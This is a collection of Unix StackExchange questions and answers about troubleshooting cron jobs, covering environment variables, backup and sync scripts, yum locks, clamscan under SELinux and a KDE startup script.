Try replacing the long command invocation and redirected output that you are trying to invoke with a script that does the same thing, e.g. put the line
/usr/local/mysql/bin/mysqldump -usomeuser -psomepassword --opt zabbix > "/backups/zabbix_mysqldb.sql_$(date +%F_%R)"
into a script file, say /root/mytestscript, make it executable, and invoke it in cron as
0 1 * * * root /root/mytestscript > /root/mytestscript.log 2> /root/mytestscript.err
...or, even better, include the output and error logging within the body of mytestscript itself, which allows you to do
0 1 * * * root /root/mytestscript
You'll probably find that cron is swallowing stdout and stderr (or, as in classic cron, attempting to mail you the output). One of the above two invocation methods will ensure you see all the logs in predictable places.
Finally, FYI, it's not secure to put passwords in scripts, so all this is a temporary fix until you solve that problem. Try https://stackoverflow.com/questions/6861355/mysqldump-launched-by-cron-and-password-security/6861458#6861458 for help there.
| Trouble with crontab CentOS 7 - not processing jobs |
1,369,877,415,000 |
Running a python script on raspbian every min, here the crontab line:
* * * * * /usr/bin/python3 /something/code.py >> /something/code.txt
However, code.txt shows me that it stops halfway in the code. I.e:
Hello 1
Hello 2
When run manually, I get more hello's, no errors.
Things I've done:
Added: #!/usr/bin/python3 to top of script
chmod +x the script
used just python3 vs /usr/bin/python3
Ran a sample **** (echo hello world >> text.txt) and it works, but python doesn't work :(
Any idea why? Thanks!
|
Probably your script needs some environmental variables that crontab doesn't set by default. Keep in mind that crontab environment variables are very limited.
There are several approaches to set your environment variables in cron:
Set each variable you need in your script.
Export a completer PATH than the default set by your contrab at the beginning of your script or before calling your script in crontab.
Source your profile: . $HOME/.profile.
| Crontab stops halfway |
1,369,877,415,000 |
I'm using a beaglebone black which works with Debian 8.6. I want to start a program after reboot. I tried crontab but it didn't work.
@reboot sleep 60 && /home/debian/acspilot/start.sh
Program consists of a config.sh file and a acsp.py python script. Each code works fine from terminal. Here are the codes:
start.sh:
#!/bin/sh
sudo su
cd home/debian/acs/
./config_pins.sh
python acsp.py
config_pins.sh :
#! /bin/bash
cd /sys/devices/platform/bone_capemgr
File=slots
if grep -q "Override Board Name,00A0,Override Manuf,univ-emmc" "$File";
then
cd
echo -e "\nHooray!! configuration available"
echo -e "\n UART 4 configuration p9.11 and p9.13"
sudo config-pin P9.11 uart
sudo config-pin -q P9.11
sudo config-pin P9.13 uart
sudo config-pin -q P9.13
echo -e "\n UART 1 configuration p9.26 and p9.24"
sudo config-pin P9.24 uart
sudo config-pin -q P9.24
sudo config-pin P9.26 uart
sudo config-pin -q P9.26
echo -e "\n UART 5 configuration p8.38 and p8.37"
sudo config-pin P8.38 uart
sudo config-pin -q P8.38
sudo config-pin P8.37 uart
sudo config-pin -q P8.37
echo -e "\n UART configuration end"
else
echo "Oops!!configuration is not available"
echo "Please check uEnv.txt file and only disable HDMI"
fi
acsp.py:
import Adafruit_BBIO.PWM as PWM
import Adafruit_BBIO.UART as UART
import time
# UART communication begins
UART.setup("UART1")
# pwm begins
PWM.start("P9_14", 5,50)
ser = serial.Serial(port = "/dev/ttyO1", baudrate=9600)
ser.close()
ser.open()
while ser.isOpen():
for i in range(1,99)
print i
ser.write(str(i)+"%")
PWM.set_duty_cycle("P9_14", i)
time.sleep(5)
ser.close()
UART.cleanup()
PWM.stop("P9_14")
PWM.cleanup()
|
The script has a sudo'ed line, and if it is cronned to a non-root user, the shell cannot be executed by itself. Instead you should first be root with
sudo su -
And then
crontab -e
as root user and add the task line
| Run shell script after reboot in beaglebone black |
1,369,877,415,000 |
I'm using a script which is working in Stand alone and is not working through the cron job .
qexma1@test:bin> head -n 10 test.sh
#!/bin/bash
declare -r PATH='/sbin:/bin:/usr/sbin:/usr/bin'
source $AEM_CONFIG/aem-wrap.conf
Cron Job :
qexma1@test:bin> crontab -l | grep aem-test.sh
01 15 * * * bin/test.sh -b ; touch bin/crontest.txt;
Flag :
qexma1@test:bin> ll bin/ | grep cron
-rw-r--r-- 1 qexma1 abc 0 Nov 11 15:01 crontest.txt
Flag file got created crontest.txt but script didn't get executed. Permissions 0755
|
As the output to stderr is as below, it means variable $AEM_CONFIG is not getting set. That is why the job fails.
/global/appaem/aem/bin/aem-test.sh: line 5: /aem-wrap.conf: No such file or directory
To fix the issue, revise the script to source the relevant file that sets $AEM_CONFIG.
As you point out the variable is defined in .bashrc, see cron ignores variables defined in “.bashrc” and “.bash_profile”. You need to add a line such as source ~/.bashrc into your script. Example:
#!/bin/bash
declare -r PATH='/sbin:/bin:/usr/sbin:/usr/bin'
source ~/.bashrc
source $AEM_CONFIG/aem-wrap.conf
| Shell script is not working via cron job |
1,369,877,415,000 |
When to run my scripts that go run reports can vary within the month as the data is not available at a standard time; sometimes on the 8th, sometimes on the 10th, etc.
I have many reports to execute so it would be fantastic to use the cron file like so:
##### VARIABLES #####
DAY_TO_RUN=8
##### Monthly #####
## COGS REPORT
0 12 $DAY_TO_RUN * * cd "/home/skilbjo/app/aqtl/jobs/Costs" ; node cogs_model.js >/dev/null
Is it possible?
|
cron by its nature do not yield to variable timing. What you want is a 3rd party job scheduler. A well known paid one is called "maestro" from the company formerly known as Tivoli (now IBM I think). Many open source equivalents exist just use google and the keywords.
Once you are in the job scheduler software land, you can make your data file a dependency to run a job. When your job's time to start, comes and passes, it looks for the dependency to be satisfied to start execution.
You can implement this similar function using a few simple shell scripts, depending on the nature of the job you want to run and how much time you want to invest in such an endeavor. After all, it is not rocket science material.
| Crontab: variables in the date/time fields |
1,369,877,415,000 |
kenneth@ballotreport:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
* * * * * /usr/bin/pgrep -f /var/www/whatapp/send_messages_out_cron.sh > /dev/null 2> /dev/null || /var/www/whatapp/send_messages_out_cron.sh >> /tmp/testcronlog.log
The file /tmp/testcronlog.log is never created. The command runs perfect when run on terminal. I have no idea what the problem could be
|
I can't find documentation to confirm or deny this but remember that cron entries are not shell scripts.
I assume that the logical or is not allowed.
Either add the logic to prevent multiple instances (which I believe is why you use the pgrep) in the script or create a wrapper script to be scheduled in cron.
| My cron is not running, nothing is showing in /var/mail/<username> or in /var/log/syslog |
1,369,877,415,000 |
I succeeded in transferring all files from a folder via ftp from a remote server to a raspberry, but I would like to transfer only new ones. Below is the working script i have.
#!/bin/bash -vx
ftp -in IP_SERVER<<END_SCRIPT
quote USER rem_user
quote PASS rem_pass
bin
prompt:off
cd /path_to_server_files
lcd /path_to_local_files
mget *.mp3
bye
END_SCRIPT
I have a company that provides background music to other companies. My method was leaving a computer in each one playing 24/7 or with other specific cron jobs, depending on the client. And the raspberry is a great way to do that instead a computer. The method i have right know that is working is a cron job per folder. Each folder has a type of music. So i will be putting different music from time to time in the server and the cron job will transfer those files once a week. It is set to transfer every mp3 file in that folder to the RPi. The thing is, it will transfer all the files there including the ones that were already there. If i put there, for example, 150 music files, it will take a long time transferring those, not to mention if it is done with all the folders since the RPi ARM is not that powerful. The solution would be not overwriting the files already there, just the new ones. Then after some time another cron job will delete all the files that have more than * days old.
I searched but it seems ftp doesn't have an option like this yet. So I found the wget command which allows to transfer without overwriting but i couldn't make it transfer multiple files. I have been trying to convert the script above with the wget command without success. Can someone with experience in this matter help out? It could be a problem with http also. Thanks in advance.
I have tried with wget command:
* * * * * wget -r -l1 -N -A.mp3 'ftp://serverUser:Password@serverIP/path_to_server_files' /var/www/rd/musica/teste/ftp11.log 2>&1
Errors:
ftp://serverUser:Password@serverIP/path_to_server_files: Bad Port Number
/var/www/rd/musica/teste: Scheme Missing
This is my attempt with rsync:
The rsyncd.conf: (I am not sure if all credentials are right, so I'ĺl put every file in here so it can be corrected.)
lock file = /var/run/rsync.lock
lock file = /var/log/rsyncd.log
pid file = /var/run/rsync.pid
[documents]
path = /var/www/rd/musica/teste
comment = The documents folder of localusername
uid = localusername
gid = localusername
read only = no
list = yes
auth users = serverusername
secrets file =/etc/rsync.secrets
hosts allow = serverIP/255.255.255.0
rsyncd.secrets
localuser:password
serveruser:password
command to run rsync:
rsync -rtv serverusername@serverIP::documents/path_to_server_files/*.mp3 /path_to_local_destination_folder
It returns these errors:
rsync: failed to connect to serverIP (serverIP): Connection refused (111)
rsync error: error in socket IO (code 10) at clientserver.c(122) [Receiver=3.0.9]
|
SOLUTION - I got this script to work. thank you for all the support you gave, If i have enough time to be working on this i'll keep trying the other options and make them work as well.
#!/usr/bin/python
import os
from ftplib import FTP
local_path='/path_to_local_files/'
os.chdir(local_path)
ftp = FTP(host='server_name_or_IP',user='username', passwd='password')
ftp.cwd('/path_to_local_files/')
f_list = ftp.nlst()
for f in f_list:
if not f.endswith("mp3"):
continue
new_f_name = local_path + f
if os.path.exists(new_f_name):
continue
print("Copying remote file <{0}>to local file <{1}>".format(f,new_f_name))
ftp.retrbinary('RETR '+ f, open(new_f_name,'wb').write)
you may need to install this in order for the script to work:
sudo apt-get install python-dev
| Transferring mp3 files from a remote server via cronjob to the RPi without overwriting |
1,369,877,415,000 |
I am trying to run a simple echo script via crontab. I set that to run every minute, but it doesn't give output on shell screen. However, it runs fine when I run the script independently.
Script
#!/bin/bash
echo "Test Script"
Crontab entry:
root@example-server ~]# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * root /root/test.sh
|
The output of a cron job doesn't go to your screen. It can't — you might not even be logged in by the time the job runs!
The output of a cron job is sent via email. A working unix system always has a local email facility, which is independent of a network connection. If you want your local email to be sent to a remote account, create a .forward file in your home directory containing the remote email address. Some distributions don't set up local email by default, in which case cron output disappears in a black hole. You need a mail transfer agent to deliver local email. On an individual machine, configure it not to accept incoming connections from the network (most distributions have an easy way to set this up). Common MTAs include Exim and Postfix; if your distribution has a default MTA, just pick it.
| script running in crontab not giving output on shell screen |
1,369,877,415,000 |
When I look at the questions and answers on this forum, it seems like the threshold to ask a question is very high. At least for someone like me, with very little knowledge of Linux. Most of the questions about cron jobs are out of my league, including the answers. So with a little bit of embarrassment, I am going to ask the simplest questions.
I want to create a cron job that shows me the data/time every minute. I want to see this in real time, on the console. I am guessing that this will eventually be done through a bash script or Python, but for now, I want to use the command line.
crontab -e
* * * * * /bin/date >> /home/pi/cron_date
I understand the concept of the stars. I have used the "which" command to find where "date" is. I am redirecting this "date" information to a file which has not been created yet, but will be created when I hit the Enter key, called cron_date.
I am using the editor "nano".
Control + O is WriteOut (which I am guessing is save/save as).
File Name to Write: /tmp/crontab.D3AZm/crontab
Question 1:
I have used the Enter key and let "nano" call it what it wants to. My cron_date file is still created under /home/pi. I understand that the file name "nano" is giving me is for a temporary file. But since I already have decided that I want this file as my own file, should I delete the "nano" suggestion and substitute it with:
File Name to Write: /home/pi/cron_date
or am I wondering about things I really don't have to think about? For now, I have been letting this temp file be named by "nano" and not substituting anything.
crontab: installing new crontab
crontab -l
My file exists. The problem now is viewing the file realtime.
I can see the date/time with:
nano cron_date
cat /home/pi/cron_date
But I have to use the same commands to update the information. My only realtime view of this file is:
tail -f /home/pi/cron_date
Question 2:
Is there a way where I can see the whole file being updated?
This is just the beginning of a hobby project I want to do. Take pictures with a Raspberry Pi of the bottom of a river. I will be making an amateur ROV. If my Raspberry Pi with camera is submerged under water, I want to measure the temp combined with the time. If it overheats I will be able to see that and turn on a fan. I might be barking up the wrong tree, but my understanding of cron jobs is where my project starts.
Raspberry Pi 1 model B: Which uses Debian.
|
When you run the crontab -e command, it lets you edit a temporary file. When you exit the editor, the temporary file is checked for syntax errors, and if there aren't any, it's installed in the system directory that contains users' crontabs. If you save the file to a different location, then the temporary file will not be modified, and thus your previous crontab remains in place. Run the command crontab -l to check the content of your crontab.
Each cron job is executed in your home directory. This is completely independent of the location of the temporary file that you edit. If you want a job to be executed in a different directory, start it with the cd command, e.g.
* * * * * cd ~/subdir && date >>somefile
This changes to the directory subdir in your home directory (which must already exist), and the output of date will thus be written to /home/pi/subdir/somefile. If the cd command fails (e.g. because the directory doesn't exist), the date command won't be executed, thanks to the && operator.
You don't need to write the full path to date, because it's in the default command search path.
I'm not sure what you mean by “see the whole file being updated”. The command tail -f shows the last 10 lines of the file at the time it is executed, then keeps running forever (or until you kill it) and shows lines as they are added. If you want to show only newly-added line (i.e. don't show anything when tail starts, tell it to output 0 lines:
tail -n 0 -f /home/pi/cron_date
If you want to show the whole file, and then print new lines as they are added, tell tail to start at line 1.
tail -n +1 -f /home/pi/cron_date
| Creating a cron job and watching its output in real time |
1,369,877,415,000 |
I've created an custom clamscan(clamav) in bash and when I run it in my shell everyhing is fine, but if I run it in a cron, it can't create the log file.
This are the errors:
/root/Scripts/clamscan : line 9: /var/log/clamscan/weekly/clamscan-Test-2014-09-16.log: No such file or directory
/bin/bash: /root/Scripts/clamscan: Permission denied
Also I get emails from cron: Null message body;hope that's ok
Before the "if it's ok mail" I get an empty email, with no message
If I run the script in a shell, it creates the log file no problem.
Questions:
What do I have to do with my bash script so it can write the appropriate files?
Why do I get these errors?
Here is the script:
#!/bin/bash
FILENAMEDATE=$(date +"%F")
/usr/bin/clamscan -i -r --log=/var/log/clamscan/weekly/clamscan-Test-$FILENAMEDATE.log /home/Username/Downloads >/dev/null 2>/dev/null
if [ $? -gt 0 ];
then
SUBJECT="Virus Report for `uname -n`, `date +%m-%d-%Y`"
mail -s "$SUBJECT" 'Email' < /var/log/clamscan/weekly/clamscan-Test-$FILENAMEDATE.log
fi
Here is /etc/crontab:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO="Email"
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
56 13 * * * root /bin/bash /root/Scripts/clamscan
|
I found the answer:
Note this system is Fedora 20.
SELinux was denying clamscan from writing, creating and more to the system.
So follow the directions in the SELinux troubleshooter on allowing clamscan the access and repeat for all accesses. There was also a denial on mailx but that didn't do anything visible to the process, it works!
Here are two of the SELinux denials:
SELinux is preventing /usr/bin/mailx from ioctl access on the file .
***** Plugin catchall (100. confidence) suggests **************************
If you believe that mailx should be allowed ioctl access on the file by default.
Then you should report this as a bug.
You can generate a local policy module to allow this access.
Do
allow this access for now by executing:
# grep mail /var/log/audit/audit.log | audit2allow -M mypol
# semodule -i mypol.pp
Additional Information:
Source Context system_u:system_r:system_mail_t:s0-s0:c0.c1023
Target Context system_u:object_r:user_home_t:s0
Target Objects [ file ]
Source mail
Source Path /usr/bin/mailx
Port <Unknown>
Host Hostname
Source RPM Packages mailx-12.5-10.fc20.x86_64
Target RPM Packages
Policy RPM selinux-policy-3.12.1-183.fc20.noarch
Selinux Enabled True
Policy Type targeted
Enforcing Mode Enforcing
Host Name Hostname
Platform Linux Hostname 3.16.2-200.fc20.x86_64 #1 SMP Mon
Sep 8 11:54:45 UTC 2014 x86_64 x86_64
Alert Count 1
First Seen 2014-09-16 17:42:37 GMT
Last Seen 2014-09-16 17:42:37 GMT
Local ID abc31a8e-345d-4d49-adf4-42cefab652a0
Raw Audit Messages
type=AVC msg=audit(1410889357.123:13483): avc: denied { ioctl } for pid=32125 comm="mail" path="PathToLogFile.log" dev="dm-3" ino=2760739 scontext=system_u:system_r:system_mail_t:s0-s0:c0.c1023 tcontext=system_u:object_r:user_home_t:s0 tclass=file permissive=0
type=SYSCALL msg=audit(1410889357.123:13483): arch=x86_64 syscall=ioctl success=no exit=EACCES a0=0 a1=5401 a2=7fff29623700 a3=8 items=0 ppid=32089 pid=32125 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=765 comm=mail exe=/usr/bin/mailx subj=system_u:system_r:system_mail_t:s0-s0:c0.c1023 key=(null)
Hash: mail,system_mail_t,user_home_t,file,ioctl
SELinux is preventing /usr/bin/clamscan from unlink access on the file .
***** Plugin catchall (100. confidence) suggests **************************
If you believe that clamscan should be allowed unlink access on the file by default.
Then you should report this as a bug.
You can generate a local policy module to allow this access.
Do
allow this access for now by executing:
# grep clamscan /var/log/audit/audit.log | audit2allow -M mypol
# semodule -i mypol.pp
Additional Information:
Source Context system_u:system_r:antivirus_t:s0-s0:c0.c1023
Target Context unconfined_u:object_r:user_home_t:s0
Target Objects [ file ]
Source clamscan
Source Path /usr/bin/clamscan
Port <Unknown>
Host Hostname
Source RPM Packages clamav-0.98.4-1.fc20.x86_64
Target RPM Packages
Policy RPM selinux-policy-3.12.1-183.fc20.noarch
Selinux Enabled True
Policy Type targeted
Enforcing Mode Enforcing
Host Name Hostname
Platform Linux Hostname 3.16.2-200.fc20.x86_64 #1 SMP Mon
Sep 8 11:54:45 UTC 2014 x86_64 x86_64
Alert Count 1
First Seen 2014-09-16 18:28:11 GMT
Last Seen 2014-09-16 18:28:11 GMT
Local ID 513c5c73-1ca8-4715-8b6a-458010ede5bf
Raw Audit Messages
type=AVC msg=audit(1410892091.713:13684): avc: denied { unlink } for pid=1305 comm="clamscan" name="eicar.com.txt" dev="dm-4" ino=10769 scontext=system_u:system_r:antivirus_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_home_t:s0 tclass=file permissive=0
type=SYSCALL msg=audit(1410892091.713:13684): arch=x86_64 syscall=unlink success=no exit=EACCES a0=21fecf0 a1=3aa5db9a10 a2=0 a3=3a7478742e6d6f63 items=0 ppid=1302 pid=1305 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=792 comm=clamscan exe=/usr/bin/clamscan subj=system_u:system_r:antivirus_t:s0-s0:c0.c1023 key=(null)
Hash: clamscan,antivirus_t,user_home_t,file,unlink
| How to make my bash script be able to create an log file for a clamscan running in cron? |
1,369,877,415,000 |
We have logrotate working for several Centos servers. One new server has a slightly different setup, and for some reason logrotate does not work for the httpd service. When I start it manually, it does work as expected. I've set this up last week, and it didn't run once in four days.
The file /etc/cron.daily/logrotate exists, so I guess the cron job should run daily.
Contents of /etc/logrotate.conf
# see "man logrotate" for details
# rotate log files weekly
weekly
# keep 4 weeks worth of backlogs
rotate 4
# create new (empty) log files after rotating old ones
create
# use date as a suffix of the rotated file
dateext
# uncomment this if you want your log files compressed
#compress
# RPM packages drop log rotation information into this directory
include /etc/logrotate.d
# no packages own wtmp and btmp -- we'll rotate them here
/var/log/wtmp {
monthly
create 0664 root utmp
minsize 1M
rotate 1
}
/var/log/btmp {
missingok
monthly
create 0600 root utmp
rotate 1
}
# system-specific logs may be also be configured here.
Contents of /etc/logrotate.d/httpd. I suppose these override the logrotate.conf settings.
/var/log/httpd/*log {
daily
compress
rotate 20
missingok
notifempty
sharedscripts
delaycompress
postrotate
/sbin/service httpd reload > /dev/null 2>/dev/null || true
endscript
}
Why doesn't it work?
|
The cron was not running. After a restart the cron worked, and logrotate started to work as well.
| Logrotate does not work for httpd service [closed] |
1,369,877,415,000 |
I have an XML files to read and load into database daily at night (cron)
So i planed to do this in a batch.
Is there any command line tool to :
1. Create a postgres schema using an XSD file?
2. Transform an XML file into SQL commands for postgres?
Any other solution is welcome.
|
You can generate SQL commands to import your file using xmlstarlet.
Here is an example.
| XML command line tool postgres |
1,369,877,415,000 |
in my php script which runs as a cron job, I have
foreach($sites as $site)
{
exec('./wkhtmltoimage-amd64 ' . $site . ' somefile.png');
exec('./zopflipng -y somefile.png somefile.png');
}
to generate screenshots monthly for each site.
Now, this cron job runs once a month, and in the unlikely event that someone wanted to delete the image while this job ran, I'm not too sure what would happen. Would the image just not get deleted since it's in use? If that's the case, then how do I make it delete after it's no longer in use?
I've thought of a solution where I could just kill the process, but I am unsure of the outcome too. If I use
lsof -t somefile.png
that will give me the PID of the process. With that, I can kill the process within the delete function of the site using
exec('lsof -t somefile.png | kill -15');
After killing, will the original script near the top of this post still go on? Will the job be canceled? Does the cron job error out? I'd like for it to just be able to move on to the next site.
|
I think I would just test to see if the file exists, if it does then flip it. You should be able to test for file existence quite easily from PHP. You could also do it from the shell (likely Bash or Bourne Shell) when you run the function exec().
exec('[ -f somefile.png ] && ./zopflipng -y somefile.png somefile.png');
Killing the exec
To address your other aspect to your question. If you're asking what happens when you kill one or both of the exec's through one of he iterations of the for loop in your PHP program, then the answer would be that your for loop should solider on and continue with the next iteration without any issues.
The exec's are separate processes from your PHP script, so unless you exec them and do something with the status codes they return, the caller should be none the wiser that they either finished or were killed.
| kill process in script while writing file behavior |
1,369,877,415,000 |
I'm looking a update manager for Debian Xfce. I installed xfce on a computer which will be use by laypersons. Therefore, I want another way (graphical) to launch apt-get update && apt-get upgrade. But I don't want to slow the system by adding gnome dependencies (update-manager-gnome is then not a solution).
The solution using cron configured to launch commands such as 'apt-get update; apt-get upgrade -y --force-yes; apt-get dist-upgrade -y --force-yes;' seems to me too dangerous. I would like to offer a choice by graphical way.
|
Well as jofel commented there is unattended-upgrade to automate the upgrade process, there is also the update-manager-core package that gives you access to the update-manager-text binary. Also, the normal package manager will do this quite nicely whenever you ask them (apt-get upgrade or aptitude full-upgrade).
This post also suggest that there's no update manager GUI for XFCE (I don't use it myself) so you either will be working with unattended-upgrades or pull update-manager-gnome which as far I see doesn't have any gnome dependency.
| Is there a update manager whitout gnome dependencies for xfce? |
1,369,877,415,000 |
I have a RHEL 6 server without any internet access that is missing a cron installation.
I am trying to install crontabs like this but I get this error:
[root@netsrvr01 cron.d]# rpm -ivh /Downloads/crontabs-1.10-33.el6.noarch.rpm
warning: /Downloads/crontabs-1.10-33.el6.noarch.rpm: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
error: Failed dependencies:
/etc/cron.d is needed by crontabs-1.10-33.el6.noarch
[root@netsrvr01 cron.d]# Error: 'NoneType' object has no attribute 'sendline'
What does it mean /etc/cron.d is needed? I do have those directories and I am logged in as root. Unfortunately, I don't have a similar machine where I can use yum downloader for either.
RPM contents:
[root@netsrvr01 Downloads]# rpm -qpl /Downloads/crontabs-1.10-33.el6.noarch.rpm
warning: /Downloads/crontabs-1.10-33.el6.noarch.rpm: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/crontab
/usr/bin/run-parts
/usr/share/man/man4/crontabs.4.gz
|
Idea #1 - directory already exists
Try running the command rpm -Uvh --test /Downloads/crontabs-1.10-33.el6.noarch.rpm first to see if it reports anything out of the ordinary. If not then do an upgrade of this package instead of an install.
I believe it's complaining because this directory already exists, but it's unclear by whom. On my CentOS 6 boxes this directory shows as being owned by the package cronie.
$ rpm -qf /etc/cron.d
cronie-1.4.4-7.el6.x86_64
When I look at the contents of the crontabs package I see the following content:
$ repoquery -l crontabs
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/crontab
/usr/bin/run-parts
/usr/share/man/man4/crontabs.4.gz
Notice there is no /etc/cron.d. If you run the following command however you'll see that crontabs requires the following resources:
$ rpm -qp --requires crontabs-1.10-33.el6.noarch.rpm
/bin/bash
/etc/cron.d
config(crontabs) = 1.10-33.el6
rpmlib(CompressedFileNames) <= 3.0.4-1
rpmlib(FileDigests) <= 4.6.0-1
rpmlib(PayloadFilesHavePrefix) <= 4.0-1
rpmlib(PayloadIsXz) <= 5.2-1
Idea #2 - verify cronie package
So this is where the requirement is coming from. I would run the following command to confirm that the package cronie is correctly installed:
$ rpm -V cronie --verbose
......... /etc/cron.d
......... /etc/cron.d/0hourly
......... c /etc/cron.deny
......... c /etc/pam.d/crond
......... /etc/rc.d/init.d/crond
......... c /etc/sysconfig/crond
......... /usr/bin/crontab
......... /usr/sbin/crond
......... /usr/share/doc/cronie-1.4.4
......... d /usr/share/doc/cronie-1.4.4/AUTHORS
......... d /usr/share/doc/cronie-1.4.4/COPYING
......... d /usr/share/doc/cronie-1.4.4/ChangeLog
......... d /usr/share/doc/cronie-1.4.4/INSTALL
......... d /usr/share/doc/cronie-1.4.4/README
......... d /usr/share/man/man1/crontab.1.gz
......... d /usr/share/man/man5/crontab.5.gz
......... d /usr/share/man/man8/cron.8.gz
......... d /usr/share/man/man8/crond.8.gz
......... /var/spool/cron
| How to solve a file path as a failed dependency when installing a RPM? |
1,369,877,415,000 |
I'm running RHEL 5.6. I type
$ crontab -e
and all I see is
Killed
I am, however, able to edit a file (let's say I call it crontab.in) and then type
$ crontab crontab.in
$ crontab -l
and see that it works that way and the entry I placed in crontab.in will run when it should.
So why is crontab -e not working for me?
|
Use strace to find out what is going on.
Instead of crontab -e type strace crontab -e. That should give a (quite long) list all system calls of the running command. Near the end you should find some kind of error indicating what is wrong. (Often it is an open of a file on which you don't have the needed permissions.)
| Cannot edit crontab |
1,645,675,515,000 |
With this cron script I am trying to get Rsync to work
*/1 * * * * /root/backup.sh `date +today/\%M`
And a shell script as the one below
#!/bin/bash -x
PATH=/bin:/usr/bin:/sbin:/usr/sbin
REMOTE="REMOTEADDRESS"
RSYNC=/usr/bin/rsync
Comment: This works
$RSYNC -aqz --exclude-from '/home/root/backups/backup-exclude.txt' /var/www/html $REMOTE:backups/
Comment: This fails
$RSYNC -aqz --exclude-from '/home/root/backups/backup-exclude.txt' /var/www/html $REMOTE:$1/
I am unable to understand why the passed parameter does not get passed correctly to the script. In the log everything looks as it should.
UPDATE
The reason for the cron to pass the parameter and not have it in the script is to have a backup schedule that allows to have :
- a backup each hour overwritten each day
- a backup each day overwritten each month
- a persistent Backup each month
The error when passing the parameter is that RSync can not mkdir on the remote server. It can with any static line. The log shows the correct directory passed when using the current cron.
|
You must ensure that the directory where you are trying to copy to (the dest/dir) exists in the remote computer:
rsync -aqz ./ user@host:dest/dir
At minimum, all the directories (except the last one) should already exist.
That is the same behavior as mkdir: mkdir will only create the last directory (by default, the -p option can change that).
That is: rsync will fail unless /home/user/dest/dir exists on the remote computer.
That is with relative directories.
The same also happens with absolute directories (ones that start with an /):
rsync -aqz ./ user@host:/home/user/dest/dir
The exact same rule but the directory is not assumed to be at the user home directory but could be anywhere (the user must have permissions to write to it, of course).
In additional testing I found that if rsync is going to use a directory like:
newdir/testdir
At least the directory newdir must exist. That is exactly the same as mkdir does. A mkdir newdir/testdir will fail if there is no newdir dir.
I tested it with the same script as you report:
using with a fixed dir,
a given dir on a parameter,
a given dir on the script $1 parameter
all the above repeated with and without cron.
In all cases, missing the initial directory of a two parts directory gets rsync to fail.
| Why I can't pass a parameter from cron to shell script [closed] |
1,645,675,515,000 |
I want to use crontab to run a script for yum updates. The problem is it seems it will run the script once, then yum is just stuck for a while (and can't be ran again). I get this error:
$ sudo yum update
Existing lock /var/run/yum.pid: another copy is running as pid 5248.
Another app is currently holding the yum lock; waiting for it to exit...
The other application is: yum
Memory:...
Started:... 5 day(s) ago...
State: Sleeping, pid: 5248
This is what I place in crontab:
$ sudo crontab -e
0 4 * * *
/usr/local/bin/yum_updates.sh
This is what's in the script:
$ sudo vim /usr/local/bin/yum_updates.sh
#!/bin/bash
yum makecache
yum -y update
yum -y upgrade
mandb
I considered yum-cron, but I've looked over the config file and it doesn't seem as customizable as crontab (i.e. I can't run security updates one day and full updates a different day), but correct me if I'm wrong, I haven't used yum-cron that much.
I would like to know how to stop this error, so I can run scripts using crontab without it holding the program hostage or getting the process stuck after only running once.
|
Great answers, but I found I could just make each type of yum update its own crontab entry like so:
$ sudo crontab -e
#Full system update midnight every Monday and Tuesday
0 0 * * 1,2 /usr/bin/yum -y update
10 0 * * 1,2 /usr/bin/yum -y upgrade
#Security updates everyday at 2AM
0 2 * * * /usr/bin/yum -y update --security
Takes more lines, but seems to work just fine. It needs to be noted that each entry should have a blank line below it, especially the last entry.
| Yum with crontab - "Another app is currently holding the yum lock" |
1,645,675,515,000 |
I am running Kubuntu 18.04, and have a simple script to reset the plasmashell every time after suspend/lockscreen since there's a known bug that corrupts folder/file names upon returning from suspend.
#!/bin/bash
dbus-monitor --session "type='signal',interface='org.freedesktop.ScreenSaver'" |
while read x; do
case "$x" in
*"boolean true"*) echo SCREEN_LOCKED;;
*"boolean false"*) killall plasmashell | kstart plasmashell;;
esac
done
This script works fine when run from a terminal.
However, when placed in crontab to load at reboot the process is not loading and can not be found in htop list.
Using crontab -e as the user I've added this in the file
@reboot /home/user/Documents/IK_Scripts/IK_ResetPlasma_BASH.sh > /home/user/Desktop/LogF
The LogF is generated after reboot, but the script does not appear to be loading.
Is this the correct way of having this script running constantly as a background process or is there a correct way of doing that? In essence i would like this script to be loading after reboot and running in the background for whenever i return from lock screen.
Any help will be greatly appreciated!
|
Of course the correct way is the always the easiest and obvious way...
In this case in Kubuntu 18.04 go to:
System Settings --> Startup and Shutdown --> Autostart --> Select the script!
Don't forget to make the script file executable!
Works like a charm and the process takes virtually no memory as it is running in the background, and every time i resume the laptop from suspend the folder/file names are not corrupted!
